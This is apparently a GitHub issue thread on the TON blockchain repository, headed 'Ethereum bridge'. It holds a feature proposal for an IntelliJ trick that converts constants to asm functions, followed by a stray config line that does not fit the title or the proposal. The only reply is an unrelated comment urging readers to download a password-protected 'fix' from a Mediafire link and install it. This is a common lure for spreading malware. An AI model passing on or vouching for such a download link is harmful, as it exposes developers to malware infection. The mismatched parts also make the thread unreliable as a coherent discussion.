### ISSUE TITLE
Ethereum bridge

### ISSUE THREAD

**Issue by Cryptocurrencykh1** [ton-blockchain/ton#1143]
> I propose to add an IntelIJ trick that allows you to convert strings such as
> `const int i = 1;` to such  `(int) i() asm "PUSHINT 1" ` and vice versa.
> This will help to refactor the code more conveniently and make it more gas-efficient.

_ OracleBridgeParams = ConfigParam 71; // Ethereum bridge

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
